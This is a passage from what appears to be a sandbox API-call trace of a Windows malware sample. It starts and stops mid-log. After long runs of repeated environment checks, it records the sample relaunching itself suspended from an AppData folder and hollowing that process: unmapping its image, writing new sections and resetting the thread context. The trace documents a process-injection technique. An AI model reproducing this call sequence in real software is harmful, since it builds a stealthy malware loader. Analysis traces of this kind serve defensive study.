pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.994] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.994] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.994] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.994] GetCurrentProcess () returned 0xffffffff [0163.994] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.994] GetSystemDefaultLangID () returned 0x2630409 [0163.994] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.995] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.995] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.995] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.995] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.995] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.995] GetThreadLocale () returned 0x409 [0163.995] GetCurrentProcess () returned 0xffffffff [0163.995] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.995] GetSystemDefaultLangID () returned 0x2630409 [0163.996] GetThreadLocale () returned 0x409 [0163.996] GetCurrentProcess () returned 0xffffffff [0163.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.996] GetSystemDefaultLangID () returned 0x2630409 [0163.996] GetThreadLocale () returned 0x409 [0163.996] GetCurrentProcess () returned 0xffffffff [0163.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.996] GetSystemDefaultLangID () returned 0x2630409 [0163.996] GetThreadLocale () returned 0x409 [0163.996] GetCurrentProcess () returned 0xffffffff [0163.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.996] GetSystemDefaultLangID () returned 0x2630409 [0163.996] GetThreadLocale () returned 0x409 [0163.996] GetCurrentProcess () returned 0xffffffff [0163.996] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.996] GetSystemDefaultLangID () returned 0x2630409 [0163.996] GetThreadLocale () returned 0x409 [0163.997] GetCurrentProcess () returned 0xffffffff [0163.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.997] GetSystemDefaultLangID () returned 0x2630409 [0163.997] GetThreadLocale () returned 0x409 [0163.997] GetCurrentProcess () returned 0xffffffff [0163.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.997] GetSystemDefaultLangID () returned 0x2630409 [0163.997] GetThreadLocale () returned 0x409 [0163.997] GetCurrentProcess () returned 0xffffffff [0163.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.997] GetSystemDefaultLangID () returned 0x2630409 [0163.997] GetThreadLocale () returned 0x409 [0163.997] GetCurrentProcess () returned 0xffffffff [0163.997] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0163.997] GetSystemDefaultLangID () returned 0x2630409 [0163.997] GetThreadLocale () returned 0x409 [0165.461] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76680000 [0165.461] GetProcAddress (hModule=0x76680000, lpProcName="VirtualProtect") returned 0x76694317 [0165.462] VirtualProtect (in: lpAddress=0x300020, dwSize=0x91090, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0166.038] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76680000 [0166.038] GetProcAddress (hModule=0x76680000, lpProcName="GlobalAlloc") returned 0x76695846 [0166.038] GetProcAddress (hModule=0x76680000, lpProcName="GetLastError") returned 0x766911c0 [0166.038] GetProcAddress (hModule=0x76680000, lpProcName="Sleep") returned 0x766910ff [0166.039] GetProcAddress (hModule=0x76680000, lpProcName="VirtualAlloc") returned 0x76691836 [0166.039] GetProcAddress (hModule=0x76680000, lpProcName="CreateToolhelp32Snapshot") returned 0x766b7327 [0166.039] GetProcAddress (hModule=0x76680000, lpProcName="Module32First") returned 0x76716279 [0166.039] GetProcAddress (hModule=0x76680000, lpProcName="CloseHandle") returned 0x766913f0 [0166.039] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0166.042] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0166.043] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3e70000 [0166.079] LoadLibraryA (lpLibFileName="user32") returned 0x75330000 [0166.080] GetProcAddress (hModule=0x75330000, lpProcName="MessageBoxA") returned 0x7539fd1e [0166.080] GetProcAddress (hModule=0x75330000, lpProcName="GetMessageExtraInfo") returned 0x7536ed76 [0166.080] LoadLibraryA (lpLibFileName="kernel32") returned 0x76680000 [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="WinExec") returned 0x76713051 [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="CreateFileA") returned 0x7669537e [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="WriteFile") returned 0x76691282 [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="CloseHandle") returned 0x766913f0 [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="CreateProcessA") returned 0x76691072 [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="GetThreadContext") returned 0x766b799c [0166.080] GetProcAddress (hModule=0x76680000, lpProcName="VirtualAlloc") returned 0x76691836 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="VirtualAllocEx") returned 0x766ad980 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="VirtualFree") returned 0x7669184e [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="ReadProcessMemory") returned 0x766acfa4 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="WriteProcessMemory") returned 0x766ad9b0 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="SetThreadContext") returned 0x76715933 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="ResumeThread") returned 0x766943a7 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="WaitForSingleObject") returned 0x76691136 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="GetModuleFileNameA") returned 0x76691491 [0166.081] GetProcAddress (hModule=0x76680000, lpProcName="GetCommandLineA") returned 0x76695159 [0166.081] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77460000 [0166.088] GetProcAddress (hModule=0x77460000, lpProcName="NtUnmapViewOfSection") returned 0x7747fc70 [0166.088] GetProcAddress (hModule=0x77460000, lpProcName="NtWriteVirtualMemory") returned 0x7747fe04 [0166.088] GetProcAddress (hModule=0x75330000, lpProcName="RegisterClassExA") returned 0x7534db98 [0166.088] GetProcAddress (hModule=0x75330000, lpProcName="CreateWindowExA") returned 0x7534d22e [0166.088] GetProcAddress (hModule=0x75330000, lpProcName="PostMessageA") returned 0x75353baa [0166.089] GetProcAddress (hModule=0x75330000, lpProcName="GetMessageA") returned 0x75347bd3 [0166.089] GetProcAddress (hModule=0x75330000, lpProcName="DefWindowProcA") returned 0x774a24e0 [0166.089] GetProcAddress (hModule=0x76680000, lpProcName="GetFileAttributesA") returned 0x766953cc [0166.089] GetProcAddress (hModule=0x76680000, lpProcName="GetStartupInfoA") returned 0x76690e00 [0166.089] GetProcAddress (hModule=0x76680000, lpProcName="VirtualProtectEx") returned 0x76714b5f [0166.089] GetProcAddress (hModule=0x76680000, lpProcName="ExitProcess") returned 0x766979c8 [0166.089] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0166.090] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0166.090] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0166.090] RegisterClassExA (param_1=0x18e260) returned 0x25c068 [0166.102] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x20016 [0166.212] PostMessageA (hWnd=0x20016, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0166.213] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0166.213] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0166.213] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x210000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x8a [0166.214] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0166.214] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" [0166.214] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0x7d8, dwThreadId=0x7dc)) returned 1 [0166.229] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.229] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0166.230] GetThreadContext (in: hThread=0x74, lpContext=0x210000 | out: lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x498440, Ebp=0x0, Eip=0x774701c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0166.243] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0166.243] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0166.337] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0166.344] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3e715a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3e715a0*, NumberOfBytesWritten=0x0) returned 0x0 [0166.364] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3e719a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3e719a0*, NumberOfBytesWritten=0x0) returned 0x0 [0166.402] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3f3bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3f3bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0166.421] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3f79ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3f79ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0166.440] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3f7ffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3f7ffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0166.457] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3f801a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3f801a0*, NumberOfBytesWritten=0x0) returned 0x0 [0166.475] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3e716ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3e716ec*, lpNumberOfBytesWritten=0x0) returned 1 [0166.476] SetThreadContext (hThread=0x74, lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x774701c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, 